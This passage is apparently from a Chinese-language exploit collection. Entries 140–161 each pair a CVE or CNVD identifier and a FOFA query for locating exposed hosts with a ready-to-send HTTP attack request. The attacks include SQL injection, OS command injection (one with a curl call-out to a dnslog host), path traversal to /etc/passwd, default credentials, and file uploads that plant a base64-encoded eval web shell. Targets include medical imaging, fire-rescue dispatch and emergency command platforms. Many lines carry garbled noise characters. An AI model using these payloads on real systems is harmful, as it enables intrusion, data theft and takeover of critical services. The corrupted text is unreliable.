1 w/ G; J7 g8 N* o: g" mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ i: f6 O8 m0 G- c
Accept-Encoding: gzip, deflate, br) Z8 l C6 Z, ^' y
Connection: close- s" u% q0 X- C: E. o( t/ W
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
9 c% x6 ^$ g6 [& U5 L( B/ lUpgrade-Insecure-Requests: 1
" x4 ^3 \! V$ O5 A! i6 Q
5 c# n+ Z4 v2 M) x2 m) ?: O3 `% ?7 V* ^. Y2 z- D9 a% `' q
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入, ~+ @8 E; v# Y
CVE-2024-2566* Z' S8 G( ~4 e- O9 y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ e8 h7 p2 h+ D- oGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ j( v1 C7 |( \6 ZHost: x.x.x.x
, f4 Z \% Y0 F- {, o5 V* uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 C- n9 j* s' n Z# e5 q; aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 w. l$ e$ B7 ]% o+ }8 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ n) F; Y, Z/ F. h' _Accept-Encoding: gzip, deflate, br9 Q9 e, _& D5 L: f, p
Connection: close3 I( H a) v4 h/ `" D
Cookie: authcode=h8g9
+ E5 j2 k( y2 b: h$ T4 oUpgrade-Insecure-Requests: 1
' q; v1 \+ d' a# L/ y- ~1 e) b I: c! q& t+ L6 d4 c0 \; c; @
# d6 n1 |, N% p5 v( a141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* ^5 y4 j- ]0 n/ X: p* {! wFOFA:body="指挥调度管理平台"
% @: b# B# b$ u" T& j# F+ e5 }+ DPOST /app/ext/ajax_users.php HTTP/1.1: c* `: w- o2 [" Q3 n: K
Host: your-ip
. H9 W. Q4 f6 u7 H5 u3 XUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
- V8 m6 E( [5 T6 M# g' ~4 PContent-Type: application/x-www-form-urlencoded. K# \' B1 |" }9 @& S
/ u. V$ u; q% t: `
' @0 u; ^0 ] c( `* Zdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
, c1 }% `: K" w6 ]
7 v3 s$ L1 v0 t1 x2 d' y5 n+ M ]1 a& `: K Q7 r# }" R% r* F
142. CMSV6车辆监控平台系统中存在弱密码
( s" ^ g+ j: I- X( e- T1 W7 s5 ICVE-2024-29666
, ^& Y. A k& ^! E; C# [FOFA:body="/808gps/"
4 O% T) ~! J* A# O) U9 ^: Dadmin/admin
0 r0 z; r y7 c- p+ I143. Netis WF2780 v2.1.40144 远程命令执行0 C0 ~/ h+ R$ D" g5 f) M
CVE-2024-25850: Z- O3 H$ ^, l4 ?7 ]8 O& S
FOFA:title='AP setup' && header='netis'9 V+ `7 I' {+ [+ T5 F
PAYLOAD
* J' y( j# a8 s6 |; V X) w
! ]5 K) R2 M4 H144. D-Link nas_sharing.cgi 命令注入
$ W. k0 T% M X. BFOFA:app="D_Link-DNS-ShareCenter"' s- z6 X. b* m* J
system参数用于传要执行的命令* z+ q; o( _8 U' p- K7 f, ~$ o. ~1 G
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1- M" r6 C$ ?& i: k4 Q
Host: x.x.x.x
' k+ R1 ^2 a; `9 K/ P" T, r# AUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0# L W: w/ F& m5 h
Connection: close
, e% u4 u6 m% }$ j. Z& HAccept: */*& { I, E/ \4 a5 F4 Q, M
Accept-Language: en
: g$ Z5 m; [0 M7 _! L8 dAccept-Encoding: gzip
, `+ g3 D! n3 i7 F+ V- l+ O4 x7 k# _- o1 j0 i7 M
/ f$ B( N! F8 c) M
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, i9 W8 _5 R% H3 O& ], s( O
CVE-2024-3400$ [+ T2 w: v3 }
FOFA:icon_hash="-631559155"/ ]( l& c) D; M+ j. S, F% o
GET /global-protect/login.esp HTTP/1.1
1 Y" Z$ h0 x8 Q. \6 |( S, @$ ZHost: 192.168.30.112:1005. Q" ]4 {/ `; \$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84& A6 D9 X8 i0 f' [& t' d6 [9 R
Connection: close: V, V* I" N; ^6 K: r! D5 N" [
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
! d" l; f) _7 ^- c" C9 s" ZAccept-Encoding: gzip
- W6 p9 B1 `1 f3 v4 y* g! w9 p+ ?, n8 _9 j4 E! Q
) \7 G' z" G% o. `# ]: E146. MajorDoMo thumb.php 未授权远程代码执行. `$ n5 U% T( B4 S& i0 x
CNVD-2024-02175
6 a* ]& I# P- _9 fFOFA:app="MajordomoSL"
+ n. M. }! o! \" l0 l8 NGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
4 i( d) G' \" v, i# D4 S- Y3 THost: x.x.x.x
7 S ^7 o% O7 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 {+ o) N% \- Z) H! d
Accept-Charset: utf-8
9 T7 Y ]+ }, Y& @4 q }5 e5 cAccept-Encoding: gzip, deflate
+ \* o y+ n" K5 P# {+ tConnection: close' h- O; a2 L5 M/ l
0 @( w* K% k8 d. I. w; H G8 E1 q
( t6 o: Q2 ~1 c& f* } w+ O147. RaidenMAILD邮件服务器v.4.9.4-路径遍历 G5 I/ {( e- Z/ w, L7 L
CVE-2024-323998 D7 i: A* k/ p) g
FOFA:body="RaidenMAILD"2 g* ~, [! z6 q5 a% E9 p8 i4 j. I
GET /webeditor/../../../windows/win.ini HTTP/1.1
; p s% ]9 {" ~0 o* M6 ~Host: 127.0.0.1:81
0 H2 L5 @. |$ R% g" Z; \" |Cache-Control: max-age=05 Q% g/ T5 I9 z
Connection: close' k; a& s& B! i2 o2 _' F- E/ t
2 B. X+ E0 c" s+ e
' \2 G! ^. \/ S0 M148. CrushFTP 认证绕过模板注入
" H) i: M& v4 T- LCVE-2024-40401 W) F( `5 E& ~8 G( c- d n" g
FOFA:body="CrushFTP": ]; w- m1 J, j2 w
PAYLOAD
- q6 Q! J5 f$ V1 {, |' ~8 g8 h. U$ m: ^* R9 g
149. AJ-Report开源数据大屏存在远程命令执行- g5 N' Y, A n9 l+ f5 q
FOFA:title="AJ-Report"2 v$ S8 ]6 B# l2 M5 M4 v5 [9 k3 n0 J
- h9 ` \! T6 V; Q9 |POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
: T& W: K4 `2 `' H+ l u0 t0 S" [Host: x.x.x.x
) |* m+ H( b" Z' t' UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& f/ l Y: e7 ^% U) d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ e4 l C: P" Y& Y3 t
Accept-Encoding: gzip, deflate, br
6 \+ R- \2 s* u4 G5 g4 F! Z& m5 lAccept-Language: zh-CN,zh;q=0.9
S: p) ~( Y. F/ G7 ?$ ?. TContent-Type: application/json;charset=UTF-8
4 g+ `8 m3 Z& M% W/ UConnection: close
' ?) K# ?- {) `. X% @; j0 y; u0 o# ~ n C- U
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}1 u7 o- X3 ]9 m+ S2 h
, G9 \) O9 p6 @0 W
150. AJ-Report 1.4.0 认证绕过与远程代码执行8 Y7 T1 k% v! @* F4 v
FOFA:title="AJ-Report"4 H! y. D9 E8 `$ m
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1% q% V' c; x* P2 r
Host: x.x.x.x
' @, R% m$ A( h/ J2 w. `# kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 w5 ]0 M' p1 Z- xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 b' ^! j- d4 p* B2 K0 VAccept-Encoding: gzip, deflate, br
' t& X2 A; K/ P( X x. O/ iAccept-Language: zh-CN,zh;q=0.9
( D; w, G# H) A" ?3 bContent-Type: application/json;charset=UTF-81 `/ n% U3 d1 c
Connection: close5 ~* g3 C; K7 x# C2 e
Content-Length: 3392 f. t& y. C3 p% |6 i
* [" p3 h, O# ~0 x0 ?$ S{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 g/ L* \0 [( P3 H H N
/ {. J: z& e! t- u, `
+ j! @) L& H. A& G8 l7 I151. AJ-Report 1.4.1 pageList sql注入
( d7 \0 ^' ~' Q9 U2 CFOFA:title="AJ-Report"
5 x7 f9 L$ J8 X$ ^% L" WGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
3 V' k+ s* n/ j$ ]; k/ zHost: x.x.x.x5 ~% c c9 s! x! H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# h- s, V; f5 S) EConnection: close! t4 \- [( T$ h1 ~
Accept-Encoding: gzip
3 e' p: a. U& i( L; c% f. r3 x! F; Z% j/ |3 G$ Z1 G
( d+ D) @; w3 K" r/ [, `152. Progress Kemp LoadMaster 远程命令执行' S$ A4 L( p- I8 c) {
CVE-2024-12126 m( v2 I8 U, m% k
LoadMaster <= 7.2.59.2 (GA): e, V7 W5 q9 f" E2 ^8 U
LoadMaster<=7.2.54.8 (LTSF)
0 T% y3 `/ B3 yLoadMaster <= 7.2.48.10 (LTS)3 [2 \3 Z/ |8 t/ D
FOFA:body="LoadMaster"
% k% c5 f* h$ `/ B# w; J5 XJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
4 F. Z% v! ~9 x9 y9 FGET /access/set?param=enableapi&value=1 HTTP/1.1
5 x0 ~' k! B' Y( E7 ~0 X1 R$ j2 [. uHost: x.x.x.x; T2 G, h0 S( n: O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
, b8 o! B W6 [7 J3 @Connection: close
% L' ^) N7 O2 E' h% TAccept: */*2 R5 b3 {( u5 M0 S
Accept-Language: en7 I* r0 c5 L# u" U! Z
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=# w* O2 f$ T/ ^5 w$ p8 T3 I
Accept-Encoding: gzip
; f" U6 J5 [6 u1 L* }
: g4 p" C1 z7 l. j/ r& O1 K2 Q Z
4 d7 q) k1 d6 m, U% v$ B$ p2 z153. gradio任意文件读取5 F9 t2 t7 T3 h7 l4 ^ W
CVE-2024-1561FOFA:body="__gradio_mode__". y4 v- x0 E) u( p/ v
第一步,请求/config文件获取componets的id) m/ J4 P9 S8 O; j1 B! k* d
http://x.x.x.x/config
8 ~+ t( |. S+ _8 Q3 l4 Y5 P( h
6 x4 q* V8 n. r S: Q( H$ v
, O3 |" _ y0 x% u4 k U7 s第二步,将/etc/passwd的内容写入到一个临时文件
. |4 j% J( q' ?7 _( g' Y4 LPOST /component_server HTTP/1.1/ z! X. W; w& l% q- P0 l
Host: x.x.x.x2 X$ A3 G0 v* o; s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
" L+ {- M- ~3 z* \4 x# u0 QConnection: close3 m! F6 j2 z: `- A c
Content-Length: 1150 Q; s8 H5 t, h& X: U1 E5 ]0 f& D
Content-Type: application/json5 m# [6 z/ c: m- q6 o4 f4 j7 Q# k# }
Accept-Encoding: gzip
1 t% t, z; L( f' n9 H; Y0 o& h+ L
) B& M2 ~' W3 e6 x5 z{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" V Q+ {" t0 S3 N- m/ l/ ~/ K1 ^+ z+ V: P/ I
* y; m/ |2 L6 R" X; g3 a9 P
第三步访问
. W( A; I+ G ]3 m! V- Y' f, Dhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd% @" U l/ e) b
4 J6 }. f" g' a5 q' F1 x1 A
) v# e7 |" X% n1 c154. 天维尔消防救援作战调度平台 SQL注入
9 R( a, x! ?. r- M4 V+ NCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
- f" x, ]; |" M( `4 x T+ `POST /twms-service-mfs/mfsNotice/page HTTP/1.15 u9 ~7 M- w9 L! X' l5 [& L0 @
Host: x.x.x.x# R2 D9 D& L1 {5 A3 H4 s
Content-Length: 1068 |. p: E6 ?9 A
Cache-Control: max-age=0
6 n \6 R6 e6 c3 b4 [Upgrade-Insecure-Requests: 1, c: {2 R/ d& l& {0 E
Origin: http://x.x.x.x) F8 ?* s& Q! p" Q" \
Content-Type: application/json
8 z: f+ P: r KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.365 g- O4 x! J) [7 F& p3 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 H D3 i w4 m6 K: i0 j
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: j0 u/ x; W Y9 V7 ]
Accept-Encoding: gzip, deflate
. k6 [+ O7 S! Z9 w( `% PAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
# e. F4 t. {, H# b1 l- IConnection: close
3 U/ W: i. J( z |, P! ^
. s/ o1 E$ n5 O, O6 n7 F7 I+ t{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}( ?8 Y2 K" D! R! ]
/ @* A) e0 S* d$ y7 s$ j. V8 i; L R% S: U: y0 _8 S# H
155. 六零导航页 file.php 任意文件上传- S- v0 J, S; r1 A4 J1 X6 A
CVE-2024-34982
* ~* \: t! p0 U- V) |! H. t, E+ C7 dFOFA:title=="上网导航 - LyLme Spage"+ P% G6 N5 ^& a( C$ L8 [
POST /include/file.php HTTP/1.18 ?7 b7 w3 X) O8 C9 I( ~
Host: x.x.x.x* m) r5 F5 ^, d- A9 f& p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, o2 U+ y0 _2 m* t* |( w1 H
Connection: close
) v8 b& W( k L$ e( T$ V$ v4 D0 ^Content-Length: 2328 `8 S7 F# T9 I
Accept: application/json, text/javascript, */*; q=0.01$ Y% \ q- v) B+ _2 G" _
Accept-Encoding: gzip, deflate, br
) ^0 A. n% L8 R/ [, |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ M! ?, e$ t. v+ d4 q: HContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
6 O6 n% B0 p7 E1 W, \% r5 t8 yX-Requested-With: XMLHttpRequest. F9 x# k% ~! T: | c# J
( a: ^$ _, [. C) m5 |: v6 Y-----------------------------qttl7vemrsold314zg0f1 k6 r% l0 c" {. a# H4 Q- P' U/ V
Content-Disposition: form-data; name="file"; filename="test.php"
9 [# i( B2 E5 W% B! H* |8 J% BContent-Type: image/png7 g+ ~1 u4 L/ ]7 i9 N0 B) }; S
7 h4 `4 K8 ~8 J G<?php phpinfo();unlink(__FILE__);?>2 r* V# T9 D* T$ B9 k8 R0 ?
-----------------------------qttl7vemrsold314zg0f--& Q# a# V% W1 J) W3 o! `
& {- o& W6 p1 ~3 X, K0 U' Z
$ U( R4 b5 R8 g- n1 u' k; j+ t访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
& O, E2 j/ T) S7 D/ c `9 M) F* k7 k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 O/ `6 N' ` _& F5 |2 Y+ v0 gCVE-2024-37214 W$ E( j* u& z) `8 h, ?1 ?, ]) ]! r
FOFA:"Location: /login.rsp"
) O; [" K& Z/ }' k·TBK DVR-41041 m7 j) v* `3 Y0 l/ k7 r
·TBK DVR-4216; Y# R8 [( N. z2 H1 X
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
1 P9 D1 x/ m- O
& s- K% S. Z# Q) E( y6 q W# R% C8 ?/ L: o1 D7 b; x) }
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1) F U( F: c* a8 ?; o
Host: x.x.x.x
( [/ o" a1 t% YUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) S% I! g9 V0 \7 D" bConnection: close
8 u' }0 o) \/ Z: z, J$ T' A, B+ _Content-Length: 0. m6 T) W5 _9 ^0 D c4 o6 a9 i
Cookie: uid=1
% m: [4 V" ^0 u8 I/ OAccept-Encoding: gzip
, h! d5 w+ E7 o+ B. z2 ?! [, w3 k! M! Q. S# ~ j
' v9 R' s f) p1 ]157. 美特CRM upload.jsp 任意文件上传
- v$ n2 N" N3 x. _CNVD-2023-06971. O1 @9 d1 E3 B# e# ^
FOFA:body="/common/scripts/basic.js": k# F6 \6 U4 _, h: A1 c2 G3 b
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.15 M! f* Q; r9 e; Z2 H# @ g" ~& k
Host: x.x.x.x& E, B, ^' a4 E" w0 L! _ i! q* O/ w1 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" `8 q- P7 Q2 f8 V7 L
Content-Length: 709
( ?3 Z- D6 d. c3 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% S: P7 U7 A$ [" M" S% xAccept-Encoding: gzip, deflate
+ d; Q* B9 U7 q [4 XAccept-Language: zh-CN,zh;q=0.9
4 R- [# B; Z( z3 j. M/ wCache-Control: max-age=04 z( j! x/ Y+ J" F2 p5 I! V
Connection: close
R1 N' l+ W. O! H7 [6 T7 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. B) ]* Q6 b2 p5 ^* SUpgrade-Insecure-Requests: 1
5 h0 q% j# C6 C8 w P4 H
$ C1 x6 ]; m) E7 |' B------WebKitFormBoundary1imovELzPsfzp5dN$ g" i9 M5 J) J* w
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"1 b* W, B O* {; h
Content-Type: application/octet-stream3 b/ U4 S: }" n _2 L G3 M1 j
- G+ |# a/ g+ c- G3 }9 H: e" ^nyhelxrutzwhrsvsrafb; L! D* c% F( |' I! O$ [
------WebKitFormBoundary1imovELzPsfzp5dN
) i! J( X) h" ]5 E" KContent-Disposition: form-data; name="key". f" o8 `9 `! S) B* G! v# s- X
* Y- Q0 J, e9 O6 j
null
; Z' `6 r6 h; |9 j1 q" F) y' L------WebKitFormBoundary1imovELzPsfzp5dN+ u/ g$ G2 d# l6 c* a! b: }2 A" b# m
Content-Disposition: form-data; name="form"5 @, I" g6 l, h4 z3 r% I: \
- P$ `3 ?3 i: w% W
null. E' ?; g! D! I7 f9 Y; @
------WebKitFormBoundary1imovELzPsfzp5dN# z x2 ^6 c! P) H* h& [, S, z
Content-Disposition: form-data; name="field"
7 R7 N* ~7 y: K+ m. @! P: X
6 y) |; o4 y1 k. a9 `' X: {" Enull
6 c! f4 F3 l* G9 V/ h4 y3 p------WebKitFormBoundary1imovELzPsfzp5dN) H( y' r/ w3 ~7 i3 T7 O/ H
Content-Disposition: form-data; name="filetitile"; N- m# W( u2 H: @* }
1 l. j! g& F0 J8 cnull+ q% U4 L9 y1 {" w0 {7 W
------WebKitFormBoundary1imovELzPsfzp5dN
2 X9 L/ [; R, x0 \Content-Disposition: form-data; name="filefolder"
% f3 z1 W3 [( a& \0 n8 J$ `2 a+ Z" b# D) d! m* h- I( [! X( m2 l' `. ~: q
null2 [6 L/ h& [: J: a2 Z0 s
------WebKitFormBoundary1imovELzPsfzp5dN--
: U& l5 u$ g9 O. E0 D4 q" Y. q) ]+ f0 I2 H
9 O' _$ M* e& J* Z$ g6 V7 _6 |/ s
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp1 e0 E' \5 j: i1 @2 D
3 Y9 s" a( ~" `* |5 J% R) n158. Mura-CMS-processAsyncObject存在SQL注入
9 N6 m7 t2 f4 K5 ?7 V6 JCVE-2024-32640
( x% f% k- j4 }+ p2 J$ kFOFA:"Generator: Masa CMS"3 T6 W; N* O! W! E. b
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 x6 k# R, h1 t" w$ f: l+ K- P* QHost: {{Hostname}}+ K6 |- H% \+ n8 d( k
Content-Type: application/x-www-form-urlencoded( o S) n/ Z" Z: C, h
6 l0 E$ w2 l, N2 f( ]/ uobject=displayregion&contenthistid=x\'&previewid=1
/ ? j8 x5 O9 E" I
7 d8 z# c7 v0 X
* O" Q; i. @" d2 q- ^8 T+ M159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
/ R: v7 B! x- y8 g" Y( GFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
' K: F0 `0 l- v2 P! X+ L8 ePOST /webservices/WebJobUpload.asmx HTTP/1.12 n3 N* q% M/ c: d' I h
Host: x.x.x.x5 r! h' b5 w; q8 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
% t8 H/ ^& A7 b5 s# UContent-Length: 1080
; [" ~2 n4 r, KAccept-Encoding: gzip, deflate
( [2 |- r( Q& K( G# i. E( gConnection: close/ E3 A& A) r) |) a, }% p7 R
Content-Type: text/xml; charset=utf-8 a# L+ h( e3 @
Soapaction: "http://rainier/jobUpload"
# }: F' l: w: ~* k! ]2 Z+ ~' t+ ^
<?xml version="1.0" encoding="utf-8"?>
, G' U6 v4 w* t: I; ~$ w<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 \7 l$ {% h9 o2 h<soap:Body>
" m( v; w( c2 B$ F: H T; a; ^) {<jobUpload xmlns="http://rainier">
& h, h* r* o% M) z7 y/ C<vcode>1</vcode>
* y4 F7 U/ N1 f; e" R<subFolder></subFolder>
2 A' S. W) B, j1 ~2 d1 l# X( K; B<fileName>abcrce.asmx</fileName>
% q r/ t& _! M$ f5 ~1 |5 D<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
8 C0 B; o5 B; g</jobUpload>
" V" B$ d# s* P% D. b0 d</soap:Body>" E, ]( Z2 _: I# `& x
</soap:Envelope># o4 L9 s8 w# ]7 H1 l
3 v- y( ^% R0 o; ^
5 p$ d, u; k: ^# c
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")! N \& w; d& [* J3 b
0 h, o. @! c5 N! h9 |# [4 @1 X: W/ @& z
160. Sonatype Nexus Repository 3目录遍历与文件读取3 o: L. K$ k1 H) i# J
CVE-2024-4956
5 A- u l" I X9 _" uFOFA:title="Nexus Repository Manager"
4 w2 `! y! y8 H( R3 tGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.11 T/ G9 N+ q( y) }5 I" E- N
Host: x.x.x.x
- E0 ~1 A0 J# z* M( Z" _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
3 h/ L$ k1 L m6 [Connection: close6 U: _5 @% L e
Accept: */*8 z0 b9 C. }3 k& `3 W: p
Accept-Language: en n' X7 _8 V8 P$ w: C0 C
Accept-Encoding: gzip
4 Y/ W: s) t9 B5 z! O/ |/ K6 a, S& J0 B, R9 I+ T. b* X5 E! }
) k9 n' l8 {& v6 W& ~6 Z1 b/ S2 Y
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. c, x a5 G# W2 ^7 w( L! M
FOFA:body="/KT_Css/qd_defaul.css"
+ a- R# u8 D8 n7 e第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密2 u+ V. x: p7 w5 F3 A/ m6 B: ^" m
POST /Webservice.asmx HTTP/1.1
& p% U& W/ ^+ v) P+ {4 ^Host: x.x.x.x' `( L5 R# [' M( @ {$ r1 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ n/ c9 I3 I) C4 M; K4 q3 y6 L. zConnection: close) f3 a5 z. D) o- i, y& R8 `, ^/ Z( O
Content-Length: 4454 X0 V: N( e! d( @0 J- z6 S
Content-Type: text/xml: A- u O% M) O1 W/ P' y* j( n9 x3 f) c$ |
Accept-Encoding: gzip( k. r4 ~/ Q! L& ~- C( v
% {3 I$ O; Q' Y$ @ ?' ]" t<?xml version="1.0" encoding="utf-8"?>
% \. E3 A3 N# x<soap:Envelope xmlns:xsi="* Z8 P& e. j$ Z% ~4 r2 Y& l
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
- Y# T" W: s$ n2 x4 Z! {2 h @2 Nxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" G. R7 q, _. ?9 L) s1 F2 s
<soap:Body>" R6 H- Z! P$ |% {* g- M
<UploadResume xmlns="http://tempuri.org/">7 R$ Q5 W+ e, m3 \3 K# Q! X
<ip>1</ip>
! f; e6 a6 h4 Z, M<fileName>../../../../dizxdell.aspx</fileName>; Q& ~5 D0 R. L2 E1 C' |/ E
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
& u2 c7 @# g3 S2 e T+ p<tag>3</tag> ^7 K* W9 q4 m6 \3 D* H
